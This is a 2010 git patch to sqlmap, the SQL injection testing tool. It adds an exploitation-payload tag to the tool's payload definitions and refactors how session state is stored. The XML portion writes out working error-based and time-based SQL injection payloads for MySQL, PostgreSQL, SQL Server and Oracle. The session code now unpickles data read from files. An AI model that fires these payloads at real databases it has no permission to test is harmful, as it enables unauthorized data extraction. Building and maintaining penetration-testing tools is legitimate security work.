From 089c16a1b89ea8f7c3e0ab8d1a0eb0ec8c26ec7e Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Wed, 1 Dec 2010 17:09:52 +0000
Subject: [PATCH] Added tag <epayload> to the payloads.xml's <test> tag to
 define which payload to use when exploiting the test type. Removed some
 useless tests. Moved <error> from queries.xml to payloads.xml as it makes
 more sense. Beeps at sql inj found only if --beep is provided. Minor fix in
 order to be able to pickle advancedDict() objects. Minor code refactoring.
 Removed useless folders.

---
 lib/controller/checks.py           |  23 ++++-
 lib/controller/controller.py       |  12 +--
 lib/core/agent.py                  |   3 +
 lib/core/datatype.py               |   8 +-
 lib/core/session.py                | 116 ++-------------------
 lib/parse/payloads.py              |   5 +-
 lib/request/inject.py              |  12 +--
 lib/techniques/error/use.py        |  49 ++++-----
 lib/techniques/outband/__init__.py |  10 --
 xml/payloads.xml                   |  78 +++++++-------
 xml/queries.xml                    | 159 ++++++++++++++---------------
 11 files changed, 187 insertions(+), 288 deletions(-)
 delete mode 100644 lib/techniques/outband/__init__.py

diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index 8a4eb39bd..df2ec0b1c 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -33,6 +33,7 @@ from lib.core.datatype import injectionDict
 from lib.core.enums import HTTPMETHOD
 from lib.core.enums import NULLCONNECTION
 from lib.core.enums import PAYLOAD
+from lib.core.enums import PLACE
 from lib.core.exception import sqlmapConnectionException
 from lib.core.exception import sqlmapGenericException
 from lib.core.exception import sqlmapNoneDataException
@@ -331,14 +332,28 @@ def checkSqlInjection(place, parameter, value):
                     # Feed with the boundaries details only the first time a
                     # test has been successful
                     if injection.place is None or injection.parameter is None:
+                        if place == PLACE.UA:
+                            injection.parameter = conf.agent
+                        else:
+                            injection.parameter = parameter
+
                         injection.place = place
-                        injection.parameter = parameter
                         injection.ptype = ptype
                         injection.prefix = prefix
                         injection.suffix = suffix
 
+                    if "epayload" in test:
+                        epayload = "%s%s" % (test.epayload, comment)
+                    else:
+                        epayload = None
+
                     # Feed with test details every time a test is successful
-                    injection.data[stype] = (title, agent.removePayloadDelimiters(reqPayload, False), where, comment)
+                    injection.data[stype] = advancedDict()
+                    injection.data[stype].title = title
+                    injection.data[stype].payload = agent.removePayloadDelimiters(reqPayload, False)
+                    injection.data[stype].where = where
+                    injection.data[stype].epayload = epayload
+                    injection.data[stype].comment = comment
 
                     if "details" in test:
                         for detailKey, detailValue in test.details.items():
@@ -351,7 +366,8 @@ def checkSqlInjection(place, parameter, value):
                             elif detailKey == "os" and injection.os is None:
                                 injection.os = detailValue
 
-                    beep()
+                    if conf.beep:
+                        beep()
 
                     # There is no need to perform this test for other
                     # <where> tags
@@ -703,7 +719,6 @@ def checkConnection(suppressOutput=False):
     try:
         page, _ = Request.queryPage(content=True)
         conf.seqMatcher.set_seq1(page)
-
     except sqlmapConnectionException, errMsg:
         errMsg = getUnicode(errMsg)
         raise sqlmapConnectionException, errMsg
diff --git a/lib/controller/controller.py b/lib/controller/controller.py
index b72e7da38..8312c678f 100644
--- a/lib/controller/controller.py
+++ b/lib/controller/controller.py
@@ -107,10 +107,9 @@ def __formatInjection(inj):
     data += "Parameter: %s\n" % inj.parameter
 
     for stype, sdata in inj.data.items():
-        stype = PAYLOAD.SQLINJECTION[stype] if isinstance(stype, int) else stype
         data += "    Type: %s\n" % stype
-        data += "    Title: %s\n" % sdata[0]
-        data += "    Payload: %s\n\n" % sdata[1]
+        data += "    Title: %s\n" % sdata.title
+        data += "    Payload: %s\n\n" % sdata.payload
 
     return data
 
@@ -136,7 +135,7 @@ def __saveToSessionFile():
         parameter = inj.parameter
 
         for stype, sdata in inj.data.items():
-            payload = sdata[1]
+            payload = sdata.payload
 
             if stype == 1:
                 kb.booleanTest = payload
@@ -303,7 +302,8 @@ def start():
                             # TODO: consider the following line in __setRequestParams()
                             __testableParameters = True
 
-            if not kb.injection.place or not kb.injection.parameter:
+            if (len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None)) \
+                and (kb.injection.place is None or kb.injection.parameter is None):
                 if not conf.string and not conf.regexp and not conf.eRegexp:
                     # NOTE: this is not needed anymore, leaving only to display
                     # a warning message to the user in case the page is not stable
@@ -394,7 +394,7 @@ def start():
                 __showInjections()
                 __selectInjection()
 
-            if kb.injection.place and kb.injection.parameter:
+            if kb.injection.place is not None and kb.injection.parameter is not None:
                 if conf.multipleTargets:
                     message = "do you want to exploit this SQL injection? [Y/n] "
                     exploit = readInput(message, default="Y")
diff --git a/lib/core/agent.py b/lib/core/agent.py
index eb41c7cf8..c5d661966 100644
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -158,6 +158,9 @@ class Agent:
         return string
 
     def cleanupPayload(self, payload):
+        if payload is None:
+            return
+
         randInt = randomInt()
         randInt1 = randomInt()
         randStr = randomStr()
diff --git a/lib/core/datatype.py b/lib/core/datatype.py
index b64d20de1..101b6315f 100644
--- a/lib/core/datatype.py
+++ b/lib/core/datatype.py
@@ -37,7 +37,7 @@ class advancedDict(dict):
         try:
             return self.__getitem__(item)
         except KeyError:
-            raise sqlmapDataException, "Unable to access item '%s'" % item
+            raise sqlmapDataException, "unable to access item '%s'" % item
 
     def __setattr__(self, item, value):
         """
@@ -56,6 +56,12 @@ class advancedDict(dict):
         else:
             self.__setitem__(item, value)
 
+    def __getstate__(self):
+        return self.__dict__
+
+    def __setstate__(self, dict):
+        self.__dict__ = dict
+
 def injectionDict():
     injection = advancedDict()
 
diff --git a/lib/core/session.py b/lib/core/session.py
index d620c8569..3bc5f6a2a 100644
--- a/lib/core/session.py
+++ b/lib/core/session.py
@@ -12,6 +12,8 @@ import re
 from lib.core.common import dataToSessionFile
 from lib.core.common import formatFingerprintString
 from lib.core.common import readInput
+from lib.core.convert import base64pickle
+from lib.core.convert import base64unpickle
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
@@ -78,30 +80,15 @@ def setInjection(inj):
     session file.
     """
 
-    if inj.place == PLACE.UA:
-        inj.parameter = conf.agent
-
     condition = (
                   ( not kb.resumedQueries
                   or ( kb.resumedQueries.has_key(conf.url) and
-                  ( not kb.resumedQueries[conf.url].has_key("Injection point")
-                  or not kb.resumedQueries[conf.url].has_key("Injection parameter")
-                  ) ) )
+                  not kb.resumedQueries[conf.url].has_key("Injection data")
+                  ) )
                 )
 
     if condition:
-        dataToSessionFile("[%s][%s][%s][Injection point][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), inj.place))
-        dataToSessionFile("[%s][%s][%s][Injection parameter][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), inj.parameter))
-        dataToSessionFile("[%s][%s][%s][Injection parameter type][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), PAYLOAD.PARAMETER[inj.ptype]))
-        dataToSessionFile("[%s][%s][%s][Injection prefix][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), inj.prefix))
-        dataToSessionFile("[%s][%s][%s][Injection suffix][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), inj.suffix))
-
-        for stype, sdata in inj.data.items():
-            dataToSessionFile("[%s][%s][%s][Injection type][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), PAYLOAD.SQLINJECTION[stype]))
-            dataToSessionFile("[%s][%s][%s][Injection title][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), sdata[0]))
-            dataToSessionFile("[%s][%s][%s][Injection payload][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), sdata[1]))
-            dataToSessionFile("[%s][%s][%s][Injection where][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), sdata[2]))
-            dataToSessionFile("[%s][%s][%s][Injection comment][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), sdata[3]))
+        dataToSessionFile("[%s][%s][%s][Injection data][%s]\n" % (conf.url, inj.place, safeFormatString(conf.parameters[inj.place]), base64pickle(inj)))
 
 def setDbms(dbms):
     """
@@ -370,96 +357,11 @@ def resumeConfKb(expression, url, value):
         except ValueError:
             pass
 
-    elif expression == "Injection point" and url == conf.url:
-        injPlace = value[:-1]
+    elif expression == "Injection data" and url == conf.url:
+        injection = base64unpickle(value[:-1])
+        kb.injections.append(injection)
 
-        logMsg = "resuming injection point '%s' from session file" % injPlace
-        logger.info(logMsg)
-
-        if not conf.paramDict.has_key(injPlace):
-            warnMsg  = "none of the parameters you provided "
-            warnMsg += "matches the resumable injection point. "
-            warnMsg += "sqlmap is going to reidentify the "
-            warnMsg += "injectable point"
-            logger.warn(warnMsg)
-        else:
-            if kb.injection.place is not None and kb.injection.parameter is not None:
-                kb.injections.append(kb.injection)
-                kb.injection = injectionDict()
-
-            kb.injection.place = injPlace
-
-    elif expression == "Injection parameter" and url == conf.url:
-        injParameter = unSafeFormatString(value[:-1])
-
-        logMsg = "resuming injection parameter '%s' from session file" % injParameter
-        logger.info(logMsg)
-
-        condition = (
-                      not conf.paramDict.has_key(kb.injection.place) or
-                      not conf.paramDict[kb.injection.place].has_key(injParameter)
-                    )
-
-        if condition:
-            warnMsg  = "none of the parameters you provided "
-            warnMsg += "matches the resumable injection parameter. "
-            warnMsg += "sqlmap is going to reidentify the "
-            warnMsg += "injectable point"
-            logger.warn(warnMsg)
-        else:
-            kb.injection.parameter = injParameter
-
-    elif expression == "Injection parameter type" and url == conf.url:
-        kb.injection.ptype = unSafeFormatString(value[:-1])
-
-        logMsg = "resuming injection parameter type '%s' from session file" % kb.injection.ptype
-        logger.info(logMsg)
-
-    elif expression == "Injection prefix" and url == conf.url:
-        kb.injection.prefix = unSafeFormatString(value[:-1])
-
-        logMsg = "resuming injection prefix '%s' from session file" % kb.injection.prefix
-        logger.info(logMsg)
-
-    elif expression == "Injection suffix" and url == conf.url:
-        kb.injection.suffix = unSafeFormatString(value[:-1])
-
-        logMsg = "resuming injection suffix '%s' from session file" % kb.injection.suffix
-        logger.info(logMsg)
-
-    elif expression == "Injection type" and url == conf.url:
-        stype = unSafeFormatString(value[:-1])
-        kb.injection.data[stype] = []
-
-        logMsg = "resuming injection type '%s' from session file" % stype
-        logger.info(logMsg)
-
-    elif expression == "Injection title" and url == conf.url:
-        title = unSafeFormatString(value[:-1])
-        kb.injection.data[kb.injection.data.keys()[0]].append(title)
-
-        logMsg = "resuming injection title '%s' from session file" % title
-        logger.info(logMsg)
-
-    elif expression == "Injection payload" and url == conf.url:
-        payload = unSafeFormatString(value[:-1])
-        kb.injection.data[kb.injection.data.keys()[0]].append(payload)
-
-        logMsg = "resuming injection payload '%s' from session file" % payload
-        logger.info(logMsg)
-
-    elif expression == "Injection where" and url == conf.url:
-        where = unSafeFormatString(value[:-1])
-        kb.injection.data[kb.injection.data.keys()[0]].append(where)
-
-        logMsg = "resuming injection where '%s' from session file" % where
-        logger.info(logMsg)
-
-    elif expression == "Injection comment" and url == conf.url:
-        comment = unSafeFormatString(value[:-1])
-        kb.injection.data[kb.injection.data.keys()[0]].append(comment)
-
-        logMsg = "resuming injection comment '%s' from session file" % comment
+        logMsg = "resuming injection data"
         logger.info(logMsg)
 
     elif expression == "Boolean-based blind injection" and url == conf.url:
diff --git a/lib/parse/payloads.py b/lib/parse/payloads.py
index 81796e00d..2e6db31f1 100644
--- a/lib/parse/payloads.py
+++ b/lib/parse/payloads.py
@@ -14,6 +14,9 @@ from lib.core.data import paths
 from lib.core.datatype import advancedDict
 
 def cleanupVals(values, tag):
+    if isinstance(values, basestring):
+        return values
+
     count = 0
 
     for value in values:
@@ -48,7 +51,7 @@ def parseXmlNode(node):
 
         for child in element.getchildren():
             if child.text and child.text.strip():
-                values = cleanupVals(child.text.split(','), child.tag)
+                values = cleanupVals(child.text.split(',') if child.tag != "epayload" else child.text, child.tag)
                 test[child.tag] = values
             else:
                 if len(child.getchildren()) == 0:
diff --git a/lib/request/inject.py b/lib/request/inject.py
index e9d1aa336..31ac9a08f 100644
--- a/lib/request/inject.py
+++ b/lib/request/inject.py
@@ -401,8 +401,8 @@ def goStacked(expression, silent=False):
         return direct(expression), None
 
     comment = queries[kb.dbms].comment.query
-    query   = agent.prefixQuery("; %s" % expression)
-    query   = agent.suffixQuery("%s;%s" % (query, comment))
+    query = agent.prefixQuery("; %s" % expression)
+    query = agent.suffixQuery("%s;%s" % (query, comment))
 
     debugMsg = "query: %s" % query
     logger.debug(debugMsg)
@@ -412,7 +412,7 @@ def goStacked(expression, silent=False):
 
     return payload, page
 
-def goError(expression, suppressOutput=False, returnPayload=False):
+def goError(expression, suppressOutput=False):
     """
     Retrieve the output of a SQL query taking advantage of an error-based
     SQL injection vulnerability on the affected parameter.
@@ -436,10 +436,8 @@ def goError(expression, suppressOutput=False, returnPayload=False):
         result = resume(expression, None)
 
     if not result:
-        result = errorUse(expression, returnPayload)
-
-        if not returnPayload:
-            dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url, kb.injection.place, conf.parameters[kb.injection.place], expression, replaceNewlineTabs(result)))
+        result = errorUse(expression)
+        dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url, kb.injection.place, conf.parameters[kb.injection.place], expression, replaceNewlineTabs(result)))
 
     if suppressOutput:
         conf.verbose = popValue()
diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py
index 7e71bb493..eb322a360 100644
--- a/lib/techniques/error/use.py
+++ b/lib/techniques/error/use.py
@@ -28,45 +28,37 @@ from lib.utils.resume import resume
 from lib.core.settings import ERROR_SPACE
 from lib.core.settings import ERROR_EMPTY_CHAR
 
-def errorUse(expression, returnPayload=False):
+def errorUse(expression):
     """
     Retrieve the output of a SQL query taking advantage of an error SQL
     injection vulnerability on the affected parameter.
     """
 
-    output         = None
-    logic          = conf.logic
-    randInt        = randomInt(1)
-    query          = agent.prefixQuery(queries[kb.misc.testedDbms].error.query)
-    query          = agent.suffixQuery(query)
-    startLimiter   = ""
-    endLimiter     = ""
+    output = None
+    randInt = randomInt(1)
+    query = agent.cleanupPayload(kb.injection.data[2].epayload)
+    query = agent.prefixQuery(query)
+    query = agent.suffixQuery(query)
+    check = "%s(?P<result>.*?)%s" % (kb.misc.start, kb.misc.stop)
 
     expressionUnescaped = expression
 
-    if kb.dbmsDetected:
-        _, _, _, _, _, _, fieldToCastStr = agent.getFields(expression)
-        nulledCastedField                = agent.nullAndCastField(fieldToCastStr)
+    _, _, _, _, _, _, fieldToCastStr = agent.getFields(expression)
+    nulledCastedField = agent.nullAndCastField(fieldToCastStr)
 
-        if kb.dbms == DBMS.MYSQL:
-            nulledCastedField            = nulledCastedField.replace("AS CHAR)", "AS CHAR(100))") # fix for that 'Subquery returns more than 1 row'
+    if kb.dbms == DBMS.MYSQL:
+        nulledCastedField = nulledCastedField.replace("AS CHAR)", "AS CHAR(100))") # fix for that 'Subquery returns more than 1 row'
 
-        expressionReplaced               = expression.replace(fieldToCastStr, nulledCastedField, 1)
-        expressionUnescaped              = unescaper.unescape(expressionReplaced)
-        startLimiter                     = unescaper.unescape("'%s'" % kb.misc.start)
-        endLimiter                       = unescaper.unescape("'%s'" % kb.misc.stop)
-    else:
-        expressionUnescaped              = kb.misc.handler.unescape(expression)
-        startLimiter                     = kb.misc.handler.unescape("'%s'" % kb.misc.start)
-        endLimiter                       = kb.misc.handler.unescape("'%s'" % kb.misc.stop)
+    expression = expression.replace(fieldToCastStr, nulledCastedField, 1)
+    expression = safeStringFormat(query, expression)
+    expression = unescaper.unescape(expression)
 
-    forgedQuery = safeStringFormat(query, (logic, randInt, startLimiter, expressionUnescaped, endLimiter))
-    debugMsg = "query: %s" % forgedQuery
+    debugMsg = "query: %s" % expression
     logger.debug(debugMsg)
 
-    payload = agent.payload(newValue=forgedQuery)
-    result = Request.queryPage(payload, content=True)
-    match = re.search('%s(?P<result>.*?)%s' % (kb.misc.start, kb.misc.stop), result[0], re.DOTALL | re.IGNORECASE)
+    payload = agent.payload(newValue=expression)
+    reqBody, _ = Request.queryPage(payload, content=True)
+    match = re.search(check, reqBody, re.DOTALL | re.IGNORECASE)
 
     if match:
         output = match.group('result')
@@ -78,7 +70,4 @@ def errorUse(expression, returnPayload=False):
                 infoMsg = "retrieved: %s" % replaceNewlineTabs(output, stdout=True)
                 logger.info(infoMsg)
 
-    if returnPayload:
-        return output, payload
-    else:
-        return output
+    return output
diff --git a/lib/techniques/outband/__init__.py b/lib/techniques/outband/__init__.py
deleted file mode 100644
index 24efa8708..000000000
--- a/lib/techniques/outband/__init__.py
+++ /dev/null
@@ -1,10 +0,0 @@
-#!/usr/bin/env python
-
-"""
-$Id$
-
-Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
-See the file 'doc/COPYING' for copying permission
-"""
-
-pass
diff --git a/xml/payloads.xml b/xml/payloads.xml
index 7aaccbf27..9c6d25221 100644
--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@@ -126,6 +126,9 @@ Tag: <test>
                original value to its negative representation
             3: Replace the parameter original value
 
+    Sub-tag: <epayload>
+        The payload that will be used to exploit the injection point.
+
     Sub-tag: <request>
         What to inject for this test.
 
@@ -187,6 +190,7 @@ Formats:
         <risk></risk>
         <clause></clause>
         <where></where>
+        <epayload></epayload>
         <request>
             <payload></payload>
             <comment></comment>
@@ -403,6 +407,7 @@ Formats:
         <risk>1</risk>
         <clause>1</clause>
         <where>1</where>
+        <epayload></epayload>
         <request>
             <payload>AND [RANDNUM]=[RANDNUM]</payload>
         </request>
@@ -418,6 +423,7 @@ Formats:
         <risk>3</risk>
         <clause>1</clause>
         <where>1</where>
+        <epayload></epayload>
         <request>
             <payload>OR [RANDNUM]=[RANDNUM]</payload>
         </request>
@@ -436,6 +442,7 @@ Formats:
         <risk>1</risk>
         <clause>2,3</clause>
         <where>1</where>
+        <epayload></epayload>
         <request>
             <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload>
         </request>
@@ -455,6 +462,7 @@ Formats:
         <risk>1</risk>
         <clause>2,3</clause>
         <where>1</where>
+        <epayload></epayload>
         <request>
             <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
         </request>
@@ -473,6 +481,7 @@ Formats:
         <risk>1</risk>
         <clause>3</clause>
         <where>1</where>
+        <epayload></epayload>
         <request>
             <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
         </request>
@@ -491,6 +500,7 @@ Formats:
         <risk>1</risk>
         <clause>3</clause>
         <where>1</where>
+        <epayload></epayload>
         <request>
             <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END) FROM DUAL)</payload>
         </request>
@@ -511,6 +521,7 @@ Formats:
         <risk>1</risk>
         <clause>2,3</clause>
         <where>1</where>
+        <epayload></epayload>
         <request>
             <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END))</payload>
         </request>
@@ -526,6 +537,7 @@ Formats:
         <risk>1</risk>
         <clause>2,3</clause>
         <where>3</where>
+        <epayload></epayload>
         <request>
             <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload>
         </request>
@@ -545,6 +557,7 @@ Formats:
         <risk>1</risk>
         <clause>2,3</clause>
         <where>3</where>
+        <epayload></epayload>
         <request>
             <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
         </request>
@@ -563,6 +576,7 @@ Formats:
         <risk>1</risk>
         <clause>3</clause>
         <where>3</where>
+        <epayload></epayload>
         <request>
             <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
         </request>
@@ -581,6 +595,7 @@ Formats:
         <risk>1</risk>
         <clause>3</clause>
         <where>3</where>
+        <epayload></epayload>
         <request>
             <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END) FROM DUAL)</payload>
         </request>
@@ -601,6 +616,7 @@ Formats:
         <risk>1</risk>
         <clause>2,3</clause>
         <where>3</where>
+        <epayload></epayload>
         <request>
             <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/0 END))</payload>
         </request>
@@ -619,6 +635,7 @@ Formats:
         <risk>0</risk>
         <clause>1</clause>
         <where>1</where>
+        <epayload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</epayload>
         <request>
             <payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload>
         </request>
@@ -638,6 +655,7 @@ Formats:
         <risk>0</risk>
         <clause>1</clause>
         <where>1</where>
+        <epayload>AND [RANDNUM]=CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC)</epayload>
         <request>
             <payload>AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)</payload>
         </request>
@@ -656,6 +674,7 @@ Formats:
         <risk>0</risk>
         <clause>1</clause>
         <where>1</where>
+        <epayload>AND [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]'))</epayload>
         <request>
             <payload>AND [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
         </request>
@@ -674,6 +693,7 @@ Formats:
         <risk>0</risk>
         <clause>1</clause>
         <where>1</where>
+        <epayload>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</epayload>
         <request>
             <payload>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
         </request>
@@ -699,6 +719,7 @@ Formats:
         <risk>0</risk>
         <clause>2,3</clause>
         <where>1</where>
+        <epayload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</epayload>
         <request>
             <payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload>
         </request>
@@ -718,6 +739,7 @@ Formats:
         <risk>0</risk>
         <clause>2,3</clause>
         <where>1</where>
+        <epayload>(CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC))</epayload>
         <request>
             <payload>(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
         </request>
@@ -736,6 +758,7 @@ Formats:
         <risk>0</risk>
         <clause>3</clause>
         <where>1</where>
+        <epayload>(CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]')))</epayload>
         <request>
             <payload>(CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload>
         </request>
@@ -754,6 +777,7 @@ Formats:
         <risk>0</risk>
         <clause>3</clause>
         <where>1</where>
+        <epayload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</epayload>
         <request>
             <payload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
         </request>
@@ -772,6 +796,7 @@ Formats:
         <risk>0</risk>
         <clause>2,3</clause>
         <where>3</where>
+        <epayload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</epayload>
         <request>
             <payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload>
         </request>
@@ -791,6 +816,7 @@ Formats:
         <risk>0</risk>
         <clause>2,3</clause>
         <where>3</where>
+        <epayload>(CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC))</epayload>
         <request>
             <payload>(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
         </request>
@@ -809,6 +835,7 @@ Formats:
         <risk>0</risk>
         <clause>3</clause>
         <where>3</where>
+        <epayload>(CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]')))</epayload>
         <request>
             <payload>(CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload>
         </request>
@@ -827,6 +854,7 @@ Formats:
         <risk>0</risk>
         <clause>3</clause>
         <where>3</where>
+        <epayload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</epayload>
         <request>
             <payload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
         </request>
@@ -1078,6 +1106,7 @@ Formats:
         <risk>1</risk>
         <clause>1</clause>
         <where>1</where>
+        <epayload>AND IF((%s), [RANDNUM], SLEEP([SLEEPTIME]))</epayload>
         <request>
             <payload>AND SLEEP([SLEEPTIME])</payload>
         </request>
@@ -1097,6 +1126,7 @@ Formats:
         <risk>1</risk>
         <clause>1</clause>
         <where>1</where>
+        <epayload>AND IF((%s), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]'))</epayload>
         <request>
             <payload>AND BENCHMARK(5000000, MD5('[SLEEPTIME]'))</payload>
         </request>
@@ -1108,25 +1138,6 @@ Formats:
         </details>
     </test>
 
-    <test>
-        <title>PostgreSQL &gt; 8.1 AND time-based blind</title>
-        <stype>5</stype>
-        <level>1</level>
-        <risk>1</risk>
-        <clause>1</clause>
-        <where>1</where>
-        <request>
-            <payload>AND PG_SLEEP([SLEEPTIME])</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>PostgreSQL</dbms>
-            <dbms_version>&gt; 8.1</dbms_version>
-        </details>
-    </test>
-
     <test>
         <title>SQLite &gt; 2.0 AND time-based blind</title>
         <stype>5</stype>
@@ -1134,6 +1145,7 @@ Formats:
         <risk>1</risk>
         <clause>1</clause>
         <where>1</where>
+        <epayload></epayload>
         <request>
             <payload>AND LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000))))</payload>
         </request>
@@ -1154,6 +1166,7 @@ Formats:
         <risk>1</risk>
         <clause>1</clause>
         <where>1</where>
+        <epayload></epayload>
         <request>
             <payload>AND (COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) > 0</payload>
         </request>
@@ -1167,7 +1180,7 @@ Formats:
     </test>
     <!--
          NOTE: there is no way to perform this test against Microsoft SQL
-         Server, Sybase, Oracle or PostgreSQL < 8.2
+         Server, Sybase, Oracle or PostgreSQL
     -->
     <!-- TODO: if possible, add payload for Microsoft Access and SAP MaxDB -->
     <!-- End of AND time-based blind tests -->
